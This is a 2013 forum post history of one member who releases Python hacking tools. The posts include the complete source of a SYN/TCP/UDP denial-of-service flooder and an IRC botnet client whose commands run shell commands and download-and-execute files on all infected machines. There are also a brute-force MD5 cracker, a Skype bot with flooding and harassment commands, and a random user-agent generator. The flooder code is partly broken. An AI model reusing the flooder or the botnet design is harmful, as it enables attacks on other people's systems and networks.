Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - harvey

Pages: [1]
1
Scripting Languages / Re: [Source] PyAgent User Agent Generator
« on: September 28, 2013, 03:19:23 pm »
I took away unneeded whitespace, and removed the ad link. We don't do the whole ad things here, don't do it in the future. I left the colors cause I thought it kinda fits the python color scheme.


Apologies, wont happen again.

2
Scripting Languages / Re: [Source] PyAgent User Agent Generator
« on: September 28, 2013, 01:02:16 pm »
Nothing is being uploaded, it's a link to a Pastebin, and if you noticed, I supplied a non-adfly link.

3
Scripting Languages / Re: How to building GUI based applications in Python?
« on: September 28, 2013, 11:53:54 am »
TKinter is what you should start off with for building GUI's, then move on to WX or something more advanced.

4
Scripting Languages / [Release] zBOT IRC Bot
« on: September 28, 2013, 09:58:08 am »
zBOT IRC BOT
--------------------------------------------------
A python IRC bot skeleton, very stable and clean.

INFORMATION
This bot is very stable, small and clean. It has a few simple commands listed below.

COMMANDS
Code: [Select]
- .cmd all [CMD] Execute [CMD] on all machines,
- .cmd [KEY] [CMD] Execute [CMD] on [KEY] machine.
- .dl all [URL] Download [URL] and execute file,
- .dl [KEY] [URL] Download [URL] and execute a file on [KEY] machine.
- .info Information about the bot.
- .kill [KEY] Uninstall the bot on [KEY] machine.
- .nuke Uninstall the bot.

USAGE
Edit the "zbot.py" file and edit your config. The following is in the config :
Code: [Select]
- ircs: IRC Server.
- ircp: IRC Port.
- ircc: IRC Channel.
- ircs_backup: Backup IRC Server.
- ircp_backup: Backup IRC Port.
- ircc_backup: Backup IRC Channel.
- version: zBot Version.

You can use "setup.py" to compile the bot into an exe file, but you must download and install Py2EXE. The bin is under 2MB!

SOURCE CODE
- zbot.py: http://pastebin.com/kbstVXXC

- setup.py: http://pastebin.com/zEcjRvWm

5
Scripting Languages / [Release] FeebaS Skype Bot
« on: September 28, 2013, 09:34:45 am »

FEEBAS
--------------------------------------------------
A python bot for Skype using the Skype4Py API.


INFORMATION
This is a Skype bot I have put a lot of time in stabilizing and optimizing. The bot is multithreaded and uses the Skype4Py API.
I also include the sabeef bot, which is a mod for doing skype hacks.
A "ReadMe" file has been included in the download for most of the Feebas information and help.
The command for the bot are shown below :


USER COMMANDS
Code: [Select]
- !chat : Information about the current chat.
- !help : Information about commands and usage.
- !info : Information about FeebaS Skype Bot.
- !isup    [URL] : Check if [URL] is down for everyone or just you.
- !list : List all files in the "text" directory.
- !load    [FILE] : Load [FILE] to the chat. (Do not have to type ".txt")
- !md5  [STRING] : Convert [STRING] to an MD5 hash.
- !tinyurl [URL] : Convert [URL] to a tinyurl.
- !topic   [NAME] : Set the current chat topic name to [NAME].


ADMIN COMMANDS
Code: [Select]
- !ass : Adds "in my ass" after every message.
- !ban    [NAME] : Kicks a user and bans them from being re-added.
- !global  [MSG] : Send [MSG] to every online contact.
- !lock : Lock feebas commands.
- !mute    [NAME] : Makes [NAME] unable to talk to chat.
- !party : Add every online contact to chat.
- !prank   [NAME] : Mute everyone except [NAME] for prank calls.
- !unass : Takes the chat out of your ass.
- !unban   [NAME] : Allow [NAME] to be re-added to the chat.
- !unlock : Unlock feebas commands.
- !unmute  [NAME] : Allow [NAME] able to talk and chat again.
- !unprank : Un-mute everyone again.
- !users : List of users and their roles.
- !wav    [FILE] : Play [FILE] in the chat. (Do not have to type ".wav")
- !wav list : List all files in the "wav" directory.


SabeeF COMMANDS
Code: [Select]
- !clear : Removes all messages from the chat.
- !giants : Remove all users from the chat and then leave.
- !info : Information about SabeeF Skype Bot.
- !flag : Send a randomly changing flag arry message.
- !flood [STRING] : Flood the chat with random, or random named skype users. ([STRING] is optional.)

USAGE
Download and install the Skype4Py API. Run "feebas.py" and type in "info" and "!help" to start using commands.

Note : Some commands can only be ran if you are the MASTER/CREATOR of the chat.
Type "/get role" to determine if you are the MASTER/CREATOR of the chat.

UPDATE: The Skype update for version 6.3 removed the option for chat moderation.
This means that in order for any command that involves editing a messgae, will
NOT work on versions 6.3 and above. This program has a lot of commands/features
that use the chat moderation ability, so in order to have Feebas function
properly, go here  and download a version
that is below 6.3 and install that.

UPDATE: Skype is now FORCING old versions to update. After a few prompts asking
you to update to the latest version, Skype may randomly end itself, and when
launched again, will be updated. If you are using an old version of Skype and
want to keep using that version, run the "disableUpdate.reg" file in the
program database.

SOURCE CODE
http://sourceforge.net/projects/feebas/

6
Scripting Languages / [Source] PyCrack MD5 Hash Cracker
« on: September 28, 2013, 08:50:19 am »
PyCrack
--------------------------------------------------
A python MD5 hash cracker that uses permutations.

INFORMATION
PyCrack will brute force an MD5 hash string, by generating a set of permutations.
Basically, it will generate every possible string using the characters a-z, A-Z,
and 0-9. It will start off as 1 character, until it has checked every possible
permutation, and then the length will increase by 1, every time it, until it hits
a maximum of a 25.
Brute forcing takes a very long time, depending on the legnth of the string that
was hashed, or if it is salted, but if this is kept running long enough, it will
crack any alphanumeric hash up to 25 characters in length.

USAGE
This is a command line tool, so it takes arguments to run.
Code: [Select]
Usage : pycrack.py [HASH]
SOURCE CODE
- Python 2.7.5: http://pastebin.com/Y9H2b2R0

- Python 3.3.2: http://pastebin.com/VA4QLc4H

7
Scripting Languages / [Source] PyFlood Dos Flooder [SYN/TCP/UDP]
« on: September 28, 2013, 08:08:16 am »
PyFlood
--------------------------------------------------
A python DoS (Denial of Service) Flooder script for SYN / TCP / UDP flooding.

INFORMATION
This script contains a nice function written to aid you in a denial of service flood.
It includes a multithreaded, fast and clean SYN flood, TCP flood, and a UDP flood.

USAGE
Running the script by itself does nothing. This is just a snippet of each function listed.
Each function can be called by its name, and included in your bot, or whatever you use it for.
Allows full control over packet size and packets sent per thread created.

SOURCE CODE
http://pastebin.com/srxKvCat

Code: (python) [Select]
# PyFlood DoS Flooder
# Version 1.0.0
# Coded by InvisibleMan in Python 3.3.2
# Download : N/A
# File     : pyflood.py

#IMPORTS
import random
import socket
import sys
import threading

#SYN FLOOD
class synFlood(threading.Thread):
    def __init__(self, ip, port, packets):
        self.ip      = ip
        self.port    = port
        self.packets = packets
        self.syn     = socket.socket()
        threading.Thread.__init__(self)
    def run(self):
        for i in range(self.packets):
            try:
                self.syn.connect((self.ip, self.port))
            except:
                pass

#TCP FLOOD
class tcpFlood(threading.Thread):
    def __init__(self, ip, port, size, packets):
        self.ip      = ip
        self.port    = port
        self.size    = size
        self.packets = packets
        self.tcp     = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        threading.Thread.__init__(self)
    def run(self):
        for i in range(self.packets):
            try:
                bytes = random._urandom(self.size)
                socket.connect(self.ip, self.port)
                socket.setblocking(0)
                socket.sendto(bytes,(self.ip, self.port))
            except:
                pass

#UDP FLOOD
class udpFlood(threading.Thread):
    def __init__(self, ip, port, size, packets):
        self.ip      = ip
        self.port    = port
        self.size    = size
        self.packets = packets
        self.udp     = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
        threading.Thread.__init__(self)
    def run(self):
        for i in range(self.packets):
            try:
                bytes = random._urandom(self.size)
                if self.port == 0:
                    self.port = random.randrange(1, 65535)
                self.udp.sendto(bytes,(self.ip, self.port))
            except:
                pass

8
Scripting Languages / [Source] PyAgent User Agent Generator
« on: September 28, 2013, 08:07:04 am »
PyAgent
--------------------------------------------------
A Python random user agent generator.

INFORMATION
This handy little script can be used in your source codes to generate a random user agents.
The resulted user agents will vary between Chrome, Internet Explorer, and Firefox, appearing to be on a Linux, Mac, or Windows computer.
The platform and just about everything down the browsers version is all random, while still being a legitimate user agent.

USAGE
Running this script itself will not do anything, this is simply a function meant to be included in your source code.
The function can be called with "getUserAgent()", which will return the randomly generated agent to a string.

SOURCE CODE
Pastebin link

Code: (python) [Select]
# PyAgent User Agent Generator
# Version 1.0.0
# Coded by InvisibleMan in Python 2.7.5
# Download : N/A
# File     : pyagent.py

#IMPORTS
import datetime
import random

#GET USER-AGENT
def getUserAgent():
    platform = random.choice(['Macintosh', 'Windows', 'X11'])
    if platform == 'Macintosh':
        os  = random.choice(['68K', 'PPC'])
    elif platform == 'Windows':
        os  = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE'])
    elif platform == 'X11':
        os  = random.choice(['Linux i686', 'Linux x86_64'])
    browser = random.choice(['chrome', 'firefox', 'ie'])
    if browser == 'chrome':
        webkit = str(random.randint(500, 599))
        version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999))
        return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
    elif browser == 'firefox':
        currentYear = datetime.date.today().year
        year = str(random.randint(2000, currentYear))
        month = random.randint(1, 12)
        if month < 10:
            month = '0' + str(month)
        else:
            month = str(month)
        day = random.randint(1, 30)
        if day < 10:
            day = '0' + str(day)
        else:
            day = str(day)
        gecko = year + month + day
        version = str(random.randint(1, 21)) + '.0'
        return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
    elif browser == 'ie':
        version = str(random.randint(1, 10)) + '.0'
        engine = str(random.randint(1, 5)) + '.0'
        option = random.choice([True, False])
        if option == True:
            token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
        else:
            token = ''
        return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'

Pages: [1]